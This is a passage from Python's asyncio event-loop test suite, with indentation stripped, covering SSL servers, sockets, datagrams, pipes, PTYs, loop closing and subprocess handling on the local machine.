@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.unpatch_get_running_loop()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
